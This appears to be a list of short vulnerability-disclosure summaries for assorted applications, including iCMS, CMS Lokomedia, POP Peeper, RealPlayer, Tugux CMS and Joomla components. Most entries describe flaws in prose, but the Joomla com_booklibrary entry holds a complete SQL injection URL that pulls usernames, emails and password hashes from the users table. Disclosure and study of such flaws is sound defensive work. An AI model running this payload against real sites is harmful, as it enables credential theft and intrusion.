This exploit is used to gain access to the iCMS v1.1 Admin panel by either exploiting an SQL injection vulnerability or by bruteforcing the admin password. The exploit requires knowledge of the web path and file privileges, however a proof of concept is still written. The exploit injects a webshell into the content.php page and then executes commands.
A Local File Download (LFD) vulnerability exists in CMS Lokomedia, which allows an attacker to download any file from the server. This vulnerability is due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'downlot.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script with a specially crafted 'file' parameter. This will allow the attacker to download any file from the server.
POP Peeper 3.7 SEH Exploit is a buffer overflow vulnerability that allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability exists in the POP Peeper 3.7.0.0 application, which is a Windows-based email client. The vulnerability is triggered when a specially crafted .ini file is opened by the application. The file contains a malicious payload that overwrites the SEH handler and executes the attacker's code.
This module exploits a initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.
Tugux CMS 1.0_final is vulnerable to multiple vulnerabilities, including SQL injection and an exploit in create_admin_parse.php which can be used to add Super Admin Accounts without any authentication. The exploit is written in Perl code.
This PoC crashes the process of Fake Webcam v.6.1 by creating a file with 1000 'A' characters and writing it to the path 'c:a.wmv'
There is a SQL Injection in com_booklibrary for Joomla 1.5. Tested on a fresh install, the author confirmed that a patch is available. PoC (show the hash of the table jos_users): http://xxx.xxx.xxx.xxx/index.php?searchtext=%'%20OR%20LOWER(b.bookid)%20LIKE%20'%a%'%20OR%20LOWER(b.isbn)%20LIKE%20'%a%'%20OR%20LOWER(b.title)%20LIKE%20'%a%'%20OR%20LOWER(b.manufacturer)%20LIKE%20'%a%'%20OR%20LOWER(b.comment)%20LIKE%20'%a%')%20AND%20b.published='1'%20AND%20b.approved='1'%20AND%20b.archived='0'%20UNION%20SELECT%201,2,username,email,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20FROM%20jos_users%20UNION%20SELECT%20b.*,%20blr2.rating2,%20c.title%20AS%20category_titel,c.id%20AS%20catid,%20c.ordering%20AS%20category_ordering%20FROM%20jos_booklibrary%20AS%20b%20LEFT%20JOIN%20jos_booklibrary_categories%20AS%20bc%20ON%20bc.bookid%20=%20b.id%20LEFT%20JOIN%20jos_categories%20AS%20c%20ON%20bc.catid%20=%20c.id%20LEFT%20JOIN%20(%20SELECT%20ROUND(avg(blr1.rating))%20AS%20rating2,%20fk_bookid%20FROM%20jos_booklibrary%20AS%20bl%20LEFT%20JOIN%20jos_booklibrary_review%20AS%20blr1%20ON%20blr1.fk_bookid%20=%20bl.id%20GROUP%20BY%20blr1.fk_bookid%20)%20blr2%20ON%20blr2.fk_bookid%20=%20b.id%20WHERE%20(LOWER(b.authors)%20LIKE%20'%&catid=0&option=com_booklibrary&task=search&Itemid=53&author=true&title=true&isbn=true&description=true&publisher=true&bookid=true
ACTi Corporation is the technology leader in IP surveillance, focusing on multiple security surveillance market segments. This exploit allows an attacker to execute arbitrary commands on the vulnerable system with root privileges. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable system.
Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit these issues.
The package suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'C' flag (Change(write)) for the 'Everyone' group, for the binary file msscasi_asp.exe and the package itself, msscasi_asp_pkg.exe.
Services By CQR